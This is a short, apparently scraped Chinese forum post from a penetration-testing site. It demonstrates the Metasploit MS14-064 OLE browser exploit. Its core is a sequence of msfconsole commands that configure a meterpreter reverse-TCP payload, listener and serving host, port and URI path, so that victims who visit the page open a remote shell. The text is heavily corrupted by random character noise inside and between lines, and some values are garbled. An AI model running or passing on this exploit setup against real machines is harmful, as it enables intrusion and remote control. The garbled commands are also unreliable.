5 \3 l7 Q d0 b, ?& k3 } 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示; c) \# ^7 r$ @. C4 a
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp6 J6 |1 c E# _( s
set AllowPowershellPrompt true
, ?- a) p, c$ A' t2 ]7 S Set LHOST 192.168.0.1091 u$ [" G$ J0 }1 M/ p& r
9 S2 e7 s% {: V* y: C2 C6 E1 ?2 g+ ~4 J6 [: w2 z2 ^3 L6 ~5 S4 [ set SRVHOST 192.168.0.109
* ?( z o8 G, N5 R2 u& C5 E3 j9 A. S Set uripath share
+ ~& J3 h1 y. dSet srvport 80! n J; x1 P# B$ Z0 N
3 V. x1 H" I' V+ e z0 ]6 m
* m! ?& R3 H# D' d5 n3 _) P
$ T5 a% A2 g1 o1 F7 \" X+ V" s% s 3 p, e, q) h3 f5 Q3 \3 g2 v
! p6 ]4 K7 k, @& i# w: s3 }7 R$ p! E9 Y7 P A; \* z# ~
) T# N5 K7 ^, j1 h9 o0 V6 [0 G5 d O8 V& @' d
' ]9 y1 ]; Y' Y, Q$ W. V2 \6 u! ]: ? m/ j: W0 x
1 [/ d* j% I4 B( @下面我们来访问本地地址如图:
( X3 Q. ~1 b' W I( D# u. x1 u2 f+ y0 G# ?
( N8 r2 J2 x. M $ e" O2 ]( ?7 C$ u4 }
+ j+ b- ~. a; p& y& Y& Q* W! B$ ]1 r; j5 C$ C9 Y3 F8 h
' o( s+ x$ H* a) c& f) @3 z
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |